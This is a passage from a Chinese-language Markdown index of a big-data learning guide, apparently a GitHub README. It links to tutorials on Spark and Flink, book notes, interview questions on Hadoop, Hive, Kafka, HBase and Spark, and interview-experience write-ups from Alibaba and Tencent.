SQL编程](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/Spark%20SQL/2%E3%80%81Spark%20SQL%E7%BC%96%E7%A8%8B.md) -  3.[Spark SQL——Spaek SQL数据的加载与保存](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/Spark%20SQL/3%E3%80%81Spark%20SQL%E6%95%B0%E6%8D%AE%E7%9A%84%E5%8A%A0%E8%BD%BD%E4%B8%8E%E4%BF%9D%E5%AD%98.md) -  4.[Spark SQL——Spaek SQL实战](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/Spark%20SQL/4%E3%80%81Spark%20SQL%E5%AE%9E%E6%88%98.md) -#### Spark Streaming -  1.[Spark Streaming——Spark Streaming概述](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/Spark%20Streaming/1%E3%80%81Spark%20Streaming%E6%A6%82%E8%BF%B0.md) -  2.[Spark Streaming——Dstream基础](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/Spark%20Streaming/2%E3%80%81Dstream%E5%9F%BA%E7%A1%80.md) -  3.[Spark Streaming——Dstream的转换&输出](https://github.com/Dr11ft/BigDataGuide/blob/master/Spark/Spark%20Streaming/3%E3%80%81Dstream%E7%9A%84%E8%BD%AC%E6%8D%A2%26%E8%BE%93%E5%87%BA.md) - -### 八、Flink -  1.[Flink——Flink核心概述](https://github.com/Dr11ft/BigDataGuide/blob/master/Flink/1%E3%80%81Flink%E6%A6%82%E8%BF%B0.md) -  2.[Flink——Flink部署](https://github.com/Dr11ft/BigDataGuide/blob/master/Flink/2%E3%80%81Flink%E9%83%A8%E7%BD%B2.md) -  3.[Flink——Flink运行架构](https://github.com/Dr11ft/BigDataGuide/blob/master/Flink/3、Flink运行架构.md) -  4.[Flink——Flink流处理API](https://github.com/Dr11ft/BigDataGuide/blob/master/Flink/4%E3%80%81Flink%E6%B5%81%E5%A4%84%E7%90%86API.md) -  5.[Flink——Flink中的Window](https://github.com/Dr11ft/BigDataGuide/blob/master/Flink/5%E3%80%81Flink%E4%B8%AD%E7%9A%84Window.md) -  6.[Flink——时间语义与Wartermark](https://github.com/Dr11ft/BigDataGuide/blob/master/Flink/6、时间语义与Wartermark.md) -  7.[Flink——ProcessFunction API(底层API)](https://github.com/Dr11ft/BigDataGuide/blob/master/Flink/7%E3%80%81ProcessFunction%20API%EF%BC%88%E5%BA%95%E5%B1%82API%EF%BC%89.md) -  
8.[Flink——状态编程和容错机制](https://github.com/Dr11ft/BigDataGuide/blob/master/Flink/8%E3%80%81%E7%8A%B6%E6%80%81%E7%BC%96%E7%A8%8B%E5%92%8C%E5%AE%B9%E9%94%99%E6%9C%BA%E5%88%B6.md) -  9.[Flink——Table API 与SQL](https://github.com/Dr11ft/BigDataGuide/blob/master/Flink/9%E3%80%81Table%20API%20%E4%B8%8ESQL.md) -  10.[Flink——Flink CEP](https://github.com/Dr11ft/BigDataGuide/blob/master/Flink/10%E3%80%81Flink%20CEP.md) - -数据仓库 ---- -  [数据仓库总结](https://zhuanlan.zhihu.com/p/371365562) - -大数据项目 ---- -  **基本上选择三到四个即可,B站直接搜索项目名字,都有视频** -  **详细说明公众号(旧时光大数据)回复“大数据项目”即可** - -读书笔记 ---- -#### 《阿里大数据之路》读书笔记 -[第一章 总述](https://github.com/MoRan1607/BigDataGuide/blob/master/Docs/%E3%80%8A%E9%98%BF%E9%87%8C%E5%A4%A7%E6%95%B0%E6%8D%AE%E4%B9%8B%E8%B7%AF%E3%80%8B%E8%AF%BB%E4%B9%A6%E7%AC%94%E8%AE%B0%EF%BC%9A%E7%AC%AC%E4%B8%80%E7%AB%A0%20%E6%80%BB%E8%BF%B0.md) - -[第二章 日志采集](https://github.com/MoRan1607/BigDataGuide/blob/master/Docs/%E7%AC%AC%E4%BA%8C%E7%AB%A0%EF%BC%9A%E6%97%A5%E5%BF%97%E9%87%87%E9%9B%86.pdf) - -[第三章 数据同步](https://github.com/MoRan1607/BigDataGuide/blob/master/Docs/PDF/%E7%AC%AC%E4%B8%89%E7%AB%A0%EF%BC%9A%E6%95%B0%E6%8D%AE%E5%90%8C%E6%AD%A5.pdf) - -[第四章 离线数据开发](https://github.com/MoRan1607/BigDataGuide/blob/master/Docs/PDF/%E7%AC%AC%E5%9B%9B%E7%AB%A0%EF%BC%9A%E7%A6%BB%E7%BA%BF%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91.pdf) - -面试题 ---- -> #### 陆续更新中。。。。。全量面试题(700+道牛客网面经原题)见知识星球 -### [大数据面试题 V1.0](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E8%AF%95%E9%A2%98%20V1.0.md) -### [大数据面试题 V3.0](https://mp.weixin.qq.com/s/hMcuDEkzH49rfSmGWy_GRg) -### [大数据面试题 V4.0](https://mp.weixin.qq.com/s/NV90886HAQqBRB1hPNiIPQ) -#### 一、Hadoop -##### 1、Hadoop基础 -[介绍下Hadoop](https://blog.csdn.net/qq_41544550/article/details/123031348) 
-[Hadoop小文件处理问题](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/Hadoop%E9%9D%A2%E8%AF%95%E9%A2%98%E6%80%BB%E7%BB%93/Hadoop/Hadoop%E5%B0%8F%E6%96%87%E4%BB%B6%E5%A4%84%E7%90%86%E9%97%AE%E9%A2%98.md) -[Hadoop中的几个进程和作用](https://github.com/MoRan1607/BigDataGuide/blob/master/Hadoop/%E9%9D%A2%E8%AF%95%E9%A2%98/Hadoop/%E9%9D%A2%E8%AF%95%E9%A2%98/Hadoop%E4%B8%AD%E7%9A%84%E5%87%A0%E4%B8%AA%E8%BF%9B%E7%A8%8B%E5%92%8C%E4%BD%9C%E7%94%A8.pdf) -[Hadoop的mapper和reducer的个数如何确定?reducer的个数依据是什么?](https://github.com/MoRan1607/BigDataGuide/blob/master/Hadoop/%E9%9D%A2%E8%AF%95%E9%A2%98/Hadoop/%E9%9D%A2%E8%AF%95%E9%A2%98/Hadoop%E7%9A%84mapper%E5%92%8Creducer%E7%9A%84%E4%B8%AA%E6%95%B0%E5%A6%82%E4%BD%95%E7%A1%AE%E5%AE%9A%EF%BC%9Freducer%E7%9A%84%E4%B8%AA%E6%95%B0%E4%BE%9D%E6%8D%AE%E6%98%AF%E4%BB%80%E4%B9%88%EF%BC%9F.md) - -##### 2、HDFS -[HDFS读写流程](https://blog.csdn.net/qq_41544550/article/details/103113335) -[HDFS的block为什么是128M?增大或减小有什么影响?](https://github.com/MoRan1607/BigDataGuide/blob/master/Hadoop/%E9%9D%A2%E8%AF%95%E9%A2%98/Hadoop/%E9%9D%A2%E8%AF%95%E9%A2%98/HDFS%E7%9A%84block%E4%B8%BA%E4%BB%80%E4%B9%88%E6%98%AF128M%EF%BC%9F%E5%A2%9E%E5%A4%A7%E6%88%96%E5%87%8F%E5%B0%8F%E6%9C%89%E4%BB%80%E4%B9%88%E5%BD%B1%E5%93%8D%EF%BC%9F/HDFS%E7%9A%84block%E4%B8%BA%E4%BB%80%E4%B9%88%E6%98%AF128M%EF%BC%9F%E5%A2%9E%E5%A4%A7%E6%88%96%E5%87%8F%E5%B0%8F%E6%9C%89%E4%BB%80%E4%B9%88%E5%BD%B1%E5%93%8D.md) - -##### 3、MapReduce -[介绍下MapReduce](https://blog.csdn.net/qq_41544550/article/details/123674103) -[MapReduce优缺点](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/Hadoop%E9%9D%A2%E8%AF%95%E9%A2%98%E6%80%BB%E7%BB%93/Hadoop/MapReduce%E4%BC%98%E7%BC%BA%E7%82%B9.md) -[MapReduce工作原理(流程)](https://github.com/MoRan1607/BigDataGuide/blob/master/Hadoop/%E9%9D%A2%E8%AF%95%E9%A2%98/Hadoop/%E9%9D%A2%E8%AF%95%E9%A2%98/MapReduce%E5%B7%A5%E4%BD%9C%E5%8E%9F%E7%90%86%EF%BC%88%E6%B5%81%E7%A8%8B%EF%BC%89.pdf) 
-[MapReduce压缩方式](https://github.com/MoRan1607/BigDataGuide/blob/master/Hadoop/%E9%9D%A2%E8%AF%95%E9%A2%98/Hadoop/%E9%9D%A2%E8%AF%95%E9%A2%98/MapReduce%E5%8E%8B%E7%BC%A9%E6%96%B9%E5%BC%8F.pdf) - -##### 4、YARN -[介绍下YARN](https://blog.csdn.net/qq_41544550/article/details/123826496?spm=1001.2014.3001.5501) - -#### 二、Zookeeper -[介绍下Zookeeper是什么?](https://blog.csdn.net/qq_41544550/article/details/123148663) -[Zookeeper有什么作用?优缺点?有什么应用场景?](https://blog.csdn.net/qq_41544550/article/details/123148688) -[Zookeeper架构](https://github.com/MoRan1607/BigDataGuide/blob/master/Zookeeper/%E9%9D%A2%E8%AF%95%E9%A2%98/Zookeeper%E6%9E%B6%E6%9E%84.pdf) - -#### 三、Hive -[说下为什么要使用Hive?Hive的优缺点?Hive的作用是什么?](https://blog.csdn.net/qq_41544550/article/details/123333839) -[Hive的用户自定义函数实现步骤与流程](https://github.com/MoRan1607/BigDataGuide/blob/master/Hive/%E9%9D%A2%E8%AF%95%E9%A2%98/Hive%E7%9A%84%E7%94%A8%E6%88%B7%E8%87%AA%E5%AE%9A%E4%B9%89%E5%87%BD%E6%95%B0%E5%AE%9E%E7%8E%B0%E6%AD%A5%E9%AA%A4%E4%B8%8E%E6%B5%81%E7%A8%8B/Hive%E7%9A%84%E7%94%A8%E6%88%B7%E8%87%AA%E5%AE%9A%E4%B9%89%E5%87%BD%E6%95%B0%E5%AE%9E%E7%8E%B0%E6%AD%A5%E9%AA%A4%E4%B8%8E%E6%B5%81%E7%A8%8B.md) -[Hive分区和分桶的区别](https://github.com/MoRan1607/BigDataGuide/blob/master/Hive/%E9%9D%A2%E8%AF%95%E9%A2%98/Hive%E7%9A%84%E7%94%A8%E6%88%B7%E8%87%AA%E5%AE%9A%E4%B9%89%E5%87%BD%E6%95%B0%E5%AE%9E%E7%8E%B0%E6%AD%A5%E9%AA%A4%E4%B8%8E%E6%B5%81%E7%A8%8B/Hive%E5%88%86%E5%8C%BA%E5%92%8C%E5%88%86%E6%A1%B6%E7%9A%84%E5%8C%BA%E5%88%AB.md) -[Hive的cluster by 、sort by、distribute by 、order by 区别?](https://github.com/MoRan1607/BigDataGuide/blob/master/Hive/%E9%9D%A2%E8%AF%95%E9%A2%98/Hive%E7%9A%84%E7%94%A8%E6%88%B7%E8%87%AA%E5%AE%9A%E4%B9%89%E5%87%BD%E6%95%B0%E5%AE%9E%E7%8E%B0%E6%AD%A5%E9%AA%A4%E4%B8%8E%E6%B5%81%E7%A8%8B/Hive%E7%9A%84cluster%20by%20%E3%80%81sort%20by%E3%80%81distribute%20by%20%E3%80%81order%20by%20%E5%8C%BA%E5%88%AB%EF%BC%9F.pdf) -[Hive 
count(distinct)有几个reduce,海量数据会有什么问题?](https://github.com/MoRan1607/BigDataGuide/blob/master/Hive/%E9%9D%A2%E8%AF%95%E9%A2%98/Hive%E7%9A%84%E7%94%A8%E6%88%B7%E8%87%AA%E5%AE%9A%E4%B9%89%E5%87%BD%E6%95%B0%E5%AE%9E%E7%8E%B0%E6%AD%A5%E9%AA%A4%E4%B8%8E%E6%B5%81%E7%A8%8B/Hive%20count(distinct)%E6%9C%89%E5%87%A0%E4%B8%AAreduce%EF%BC%8C%E6%B5%B7%E9%87%8F%E6%95%B0%E6%8D%AE%E4%BC%9A%E6%9C%89%E4%BB%80%E4%B9%88%E9%97%AE%E9%A2%98%EF%BC%9F.pdf) - -#### 四、Flume -[介绍下Flume](https://blog.csdn.net/qq_41544550/article/details/123451528?spm=1001.2014.3001.5501) -[Flume结构](https://github.com/MoRan1607/BigDataGuide/blob/master/Flume/%E9%9D%A2%E8%AF%95%E9%A2%98/Flume%E6%9E%B6%E6%9E%84/Flume%E6%9E%B6%E6%9E%84.md) - -#### 五、Kafka -[介绍下Kafka,Kafka的作用?Kafka的组件?适用场景?](https://blog.csdn.net/qq_41544550/article/details/123534948) -[Kafka实现高吞吐的原理?](https://github.com/MoRan1607/BigDataGuide/blob/master/Kafka/%E9%9D%A2%E8%AF%95%E9%A2%98/Kafka%E5%AE%9E%E7%8E%B0%E9%AB%98%E5%90%9E%E5%90%90%E7%9A%84%E5%8E%9F%E7%90%86.pdf) -[Kafka的一条message中包含了哪些信息?](https://github.com/MoRan1607/BigDataGuide/blob/master/Kafka/%E9%9D%A2%E8%AF%95%E9%A2%98/Kafka%E7%9A%84%E4%B8%80%E6%9D%A1message%E4%B8%AD%E5%8C%85%E5%90%AB%E4%BA%86%E5%93%AA%E4%BA%9B%E4%BF%A1%E6%81%AF%EF%BC%9F.pdf) -[Kafka的消费者和消费者组有什么区别?为什么需要消费者组?](https://github.com/MoRan1607/BigDataGuide/blob/master/Kafka/%E9%9D%A2%E8%AF%95%E9%A2%98/Kafka%E7%9A%84%E6%B6%88%E8%B4%B9%E8%80%85%E5%92%8C%E6%B6%88%E8%B4%B9%E8%80%85%E7%BB%84%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB%EF%BC%9F%E4%B8%BA%E4%BB%80%E4%B9%88%E9%9C%80%E8%A6%81%E6%B6%88%E8%B4%B9%E8%80%85%E7%BB%84%EF%BC%9F.pdf) -[Kafka的ISR、OSR和ACK介绍,ACK分别有几种值?](https://github.com/MoRan1607/BigDataGuide/blob/master/Kafka/%E9%9D%A2%E8%AF%95%E9%A2%98/Kafka%E7%9A%84ISR%E3%80%81OSR%E5%92%8CACK%E4%BB%8B%E7%BB%8D%EF%BC%8CACK%E5%88%86%E5%88%AB%E6%9C%89%E5%87%A0%E7%A7%8D%E5%80%BC%EF%BC%9F.pdf) 
-[Kafka怎么保证数据不丢失,不重复?](https://github.com/MoRan1607/BigDataGuide/blob/master/Kafka/%E9%9D%A2%E8%AF%95%E9%A2%98/Kafka%E6%80%8E%E4%B9%88%E4%BF%9D%E8%AF%81%E6%95%B0%E6%8D%AE%E4%B8%8D%E4%B8%A2%E5%A4%B1%EF%BC%8C%E4%B8%8D%E9%87%8D%E5%A4%8D%EF%BC%9F.pdf) -[Kafka的单播和多播](https://github.com/MoRan1607/BigDataGuide/blob/master/Kafka/%E9%9D%A2%E8%AF%95%E9%A2%98/Kafka%E7%9A%84%E5%8D%95%E6%92%AD%E5%92%8C%E5%A4%9A%E6%92%AD.pdf) -[说下Kafka的ISR机制](https://github.com/MoRan1607/BigDataGuide/blob/master/Kafka/%E9%9D%A2%E8%AF%95%E9%A2%98/%E8%AF%B4%E4%B8%8BKafka%E7%9A%84ISR%E6%9C%BA%E5%88%B6.pdf) - -#### 六、HBase -[介绍下HBase架构](https://blog.csdn.net/qq_41544550/article/details/123583361) -[HBase为什么查询快](https://github.com/MoRan1607/BigDataGuide/blob/master/HBase/%E9%9D%A2%E8%AF%95%E9%A2%98/HBase%E4%B8%BA%E4%BB%80%E4%B9%88%E6%9F%A5%E8%AF%A2%E5%BF%AB.pdf) -[HBase的大合并、小合并是什么?](https://github.com/MoRan1607/BigDataGuide/blob/master/HBase/%E9%9D%A2%E8%AF%95%E9%A2%98/HBase%E7%9A%84%E5%A4%A7%E5%90%88%E5%B9%B6%E3%80%81%E5%B0%8F%E5%90%88%E5%B9%B6%E6%98%AF%E4%BB%80%E4%B9%88%EF%BC%9F.pdf) -[HBase的rowkey设计原则](https://github.com/MoRan1607/BigDataGuide/blob/master/HBase/%E9%9D%A2%E8%AF%95%E9%A2%98/HBase%E7%9A%84rowkey%E8%AE%BE%E8%AE%A1%E5%8E%9F%E5%88%99.pdf) -[HBase的一个region由哪些东西组成?](https://github.com/MoRan1607/BigDataGuide/blob/master/HBase/%E9%9D%A2%E8%AF%95%E9%A2%98/HBase%E7%9A%84%E4%B8%80%E4%B8%AAregion%E7%94%B1%E5%93%AA%E4%BA%9B%E4%B8%9C%E8%A5%BF%E7%BB%84%E6%88%90%EF%BC%9F.pdf) -[HBase读写数据流程](https://github.com/MoRan1607/BigDataGuide/blob/master/HBase/%E9%9D%A2%E8%AF%95%E9%A2%98/HBase%E8%AF%BB%E5%86%99%E6%95%B0%E6%8D%AE%E6%B5%81%E7%A8%8B.pdf) -[HBase的RegionServer宕机以后怎么恢复的?](https://github.com/MoRan1607/BigDataGuide/blob/master/HBase/%E9%9D%A2%E8%AF%95%E9%A2%98/HBase%E7%9A%84RegionServer%E5%AE%95%E6%9C%BA%E4%BB%A5%E5%90%8E%E6%80%8E%E4%B9%88%E6%81%A2%E5%A4%8D%E7%9A%84%EF%BC%9F.pdf) 
-[HBase的读写缓存](https://github.com/MoRan1607/BigDataGuide/blob/master/HBase/%E9%9D%A2%E8%AF%95%E9%A2%98/HBase%E7%9A%84%E8%AF%BB%E5%86%99%E7%BC%93%E5%AD%98.pdf) - -#### 七、Spark - -[说下对RDD的理解?RDD特点、算子?](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/Spark%E9%9D%A2%E8%AF%95%E9%A2%98%E6%95%B4%E7%90%86/Spark/Pics/%E8%AF%B4%E4%B8%8B%E5%AF%B9RDD%E7%9A%84%E7%90%86%E8%A7%A3%EF%BC%9FRDD%E7%89%B9%E7%82%B9%E3%80%81%E7%AE%97%E5%AD%90/%E8%AF%B4%E4%B8%8B%E5%AF%B9RDD%E7%9A%84%E7%90%86%E8%A7%A3%EF%BC%9FRDD%E7%89%B9%E7%82%B9%E3%80%81%E7%AE%97%E5%AD%90.md) -[Spark小文件问题](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/Spark%E9%9D%A2%E8%AF%95%E9%A2%98%E6%95%B4%E7%90%86/Spark/Spark%E5%B0%8F%E6%96%87%E4%BB%B6%E9%97%AE%E9%A2%98/Spark%E5%B0%8F%E6%96%87%E4%BB%B6%E9%97%AE%E9%A2%98.md) -[Spark的内存模型](https://github.com/MoRan1607/BigDataGuide/blob/master/Spark/%E9%9D%A2%E8%AF%95%E9%A2%98/Spark%E7%9A%84%E5%86%85%E5%AD%98%E6%A8%A1%E5%9E%8B/Spark%E7%9A%84%E5%86%85%E5%AD%98%E6%A8%A1%E5%9E%8B.md) -[Spark的Job、Stage、Task分别介绍下,如何划分?](https://github.com/MoRan1607/BigDataGuide/blob/master/Spark/%E9%9D%A2%E8%AF%95%E9%A2%98/Spark%E7%9A%84%E5%86%85%E5%AD%98%E6%A8%A1%E5%9E%8B/Spark%E7%9A%84Job%E3%80%81Stage%E3%80%81Task%E5%88%86%E5%88%AB%E4%BB%8B%E7%BB%8D%E4%B8%8B%EF%BC%8C%E5%A6%82%E4%BD%95%E5%88%92%E5%88%86.md) -[Spark的RDD、DataFrame、DataSet、DataStream区别?](https://github.com/MoRan1607/BigDataGuide/blob/master/Spark/%E9%9D%A2%E8%AF%95%E9%A2%98/Spark%E7%9A%84%E5%86%85%E5%AD%98%E6%A8%A1%E5%9E%8B/Spark%E7%9A%84RDD%E3%80%81DataFrame%E3%80%81DataSet%E3%80%81DataStream%E5%8C%BA%E5%88%AB%EF%BC%9F.pdf) -[RDD的容错](https://github.com/MoRan1607/BigDataGuide/blob/master/Spark/%E9%9D%A2%E8%AF%95%E9%A2%98/Spark%E7%9A%84%E5%86%85%E5%AD%98%E6%A8%A1%E5%9E%8B/RDD%E7%9A%84%E5%AE%B9%E9%94%99.pdf) 
-[说下Spark中的Transform和Action,为什么Spark要把操作分为Transform和Action?](https://github.com/MoRan1607/BigDataGuide/blob/master/Spark/%E9%9D%A2%E8%AF%95%E9%A2%98/Spark%E7%9A%84%E5%86%85%E5%AD%98%E6%A8%A1%E5%9E%8B/%E8%AF%B4%E4%B8%8BSpark%E4%B8%AD%E7%9A%84Transform%E5%92%8CAction%EF%BC%8C%E4%B8%BA%E4%BB%80%E4%B9%88Spark%E8%A6%81%E6%8A%8A%E6%93%8D%E4%BD%9C%E5%88%86%E4%B8%BATransform%E5%92%8CAction%EF%BC%9F.pdf) -[Spark的任务执行流程](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/Spark%E9%9D%A2%E8%AF%95%E9%A2%98%E6%95%B4%E7%90%86/Spark%E7%9A%84%E4%BB%BB%E5%8A%A1%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B.pdf) -[Spark的架构](https://github.com/MoRan1607/BigDataGuide/blob/master/Spark/%E9%9D%A2%E8%AF%95%E9%A2%98/Spark%E7%9A%84%E6%9E%B6%E6%9E%84.pdf) - - -#### 八、Flink - -[介绍下Flink](https://github.com/MoRan1607/BigDataGuide/blob/master/Flink/%E4%BB%8B%E7%BB%8D%E4%B8%8BFlink) -[Flink架构](https://github.com/MoRan1607/BigDataGuide/blob/master/Flink/%E9%9D%A2%E8%AF%95%E9%A2%98/Flink%E6%9E%B6%E6%9E%84.pdf) - -#### 九、数仓面试题 -[数据仓库和数据中台区别](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E6%95%B0%E4%BB%93/%E6%95%B0%E6%8D%AE%E4%BB%93%E5%BA%93%E5%92%8C%E6%95%B0%E6%8D%AE%E4%B8%AD%E5%8F%B0%E5%8C%BA%E5%88%AB.pdf) - -#### 十、综合面试题 -[Spark和MapReduce之间的区别?各自优缺点?](https://github.com/MoRan1607/BigDataGuide/blob/master/Spark/%E9%9D%A2%E8%AF%95%E9%A2%98/Spark%E7%9A%84%E5%86%85%E5%AD%98%E6%A8%A1%E5%9E%8B/Spark%E5%92%8CMapReduce%E4%B9%8B%E9%97%B4%E7%9A%84%E5%8C%BA%E5%88%AB%EF%BC%9F%E5%90%84%E8%87%AA%E4%BC%98%E7%BC%BA%E7%82%B9%EF%BC%9F.pdf) -[Spark和Flink的区别](https://github.com/MoRan1607/BigDataGuide/blob/master/Flink/%E9%9D%A2%E8%AF%95%E9%A2%98/Spark%E5%92%8CFlink%E7%9A%84%E5%8C%BA%E5%88%AB.pdf) - - -牛客网面经 ---- -### 大数据面经 -#### 阿里面经 -[阿里巴巴 二面凉经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E9%98%BF%E9%87%8C%E5%B7%B4%E5%B7%B4%20%E4%BA%8C%E9%9D%A2%E5%87%89%E7%BB%8F.pdf) 
-[阿里云大数据平台三面+HR面【已OC】](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E9%98%BF%E9%87%8C%E4%BA%91%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%B9%B3%E5%8F%B0%E4%B8%89%E9%9D%A2%2BHR%E9%9D%A2%E3%80%90%E5%B7%B2OC%E3%80%91.pdf) -[阿里-数据研发-1面2面](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E9%98%BF%E9%87%8C-%E6%95%B0%E6%8D%AE%E7%A0%94%E5%8F%91-1%E9%9D%A22%E9%9D%A2.pdf) -[4.23阿里数开一面](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E9%98%BF%E9%87%8C-01/4.23%E9%98%BF%E9%87%8C%E6%95%B0%E5%BC%80%E4%B8%80%E9%9D%A2.pdf) -[分享一个大数据的面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E9%98%BF%E9%87%8C-01/%E5%88%86%E4%BA%AB%E4%B8%80%E4%B8%AA%E5%A4%A7%E6%95%B0%E6%8D%AE%E7%9A%84%E9%9D%A2%E7%BB%8F.pdf) -[十余家公司大数据开发面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E9%98%BF%E9%87%8C-01/%E5%8D%81%E4%BD%99%E5%AE%B6%E5%85%AC%E5%8F%B8%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E9%9D%A2%E7%BB%8F.pdf) -[大数据面经好少啊,我来写点](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E9%98%BF%E9%87%8C-01/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F%E5%A5%BD%E5%B0%91%E5%95%8A%EF%BC%8C%E6%88%91%E6%9D%A5%E5%86%99%E7%82%B9.pdf) -[提前批面经(Java_大数据)](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E9%98%BF%E9%87%8C-01/%E6%8F%90%E5%89%8D%E6%89%B9%E9%9D%A2%E7%BB%8F(Java_%E5%A4%A7%E6%95%B0%E6%8D%AE).pdf) 
-[阿里-数据技术与产品部(两次简历面)](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E9%98%BF%E9%87%8C-01/%E9%98%BF%E9%87%8C-%E6%95%B0%E6%8D%AE%E6%8A%80%E6%9C%AF%E4%B8%8E%E4%BA%A7%E5%93%81%E9%83%A8%EF%BC%88%E4%B8%A4%E6%AC%A1%E7%AE%80%E5%8E%86%E9%9D%A2%EF%BC%89.pdf) -[阿里云一二三面凉经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E9%98%BF%E9%87%8C-01/%E9%98%BF%E9%87%8C%E4%BA%91%E4%B8%80%E4%BA%8C%E4%B8%89%E9%9D%A2%E5%87%89%E7%BB%8F.pdf) -[阿里巴巴淘系大数据研发工程师三面面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E9%98%BF%E9%87%8C-01/%E9%98%BF%E9%87%8C%E5%B7%B4%E5%B7%B4%E6%B7%98%E7%B3%BB%E5%A4%A7%E6%95%B0%E6%8D%AE%E7%A0%94%E5%8F%91%E5%B7%A5%E7%A8%8B%E5%B8%88%E4%B8%89%E9%9D%A2%E9%9D%A2%E7%BB%8F.pdf) -[阿里集团大淘宝一面凉经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E9%98%BF%E9%87%8C-01/%E9%98%BF%E9%87%8C%E9%9B%86%E5%9B%A2%E5%A4%A7%E6%B7%98%E5%AE%9D%E4%B8%80%E9%9D%A2%E5%87%89%E7%BB%8F.pdf) -[阿里巴巴 二面凉经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E9%98%BF%E9%87%8C%E5%B7%B4%E5%B7%B4%20%E4%BA%8C%E9%9D%A2%E5%87%89%E7%BB%8F.pdf) - -#### 腾讯面经 -[2022暑假实习 数据开发 字节 腾讯](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/2022%E6%9A%91%E5%81%87%E5%AE%9E%E4%B9%A0%20%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%20%E5%AD%97%E8%8A%82%20%E8%85%BE%E8%AE%AF%EF%BC%88%E5%B7%B2offer.pdf) -[4.13 
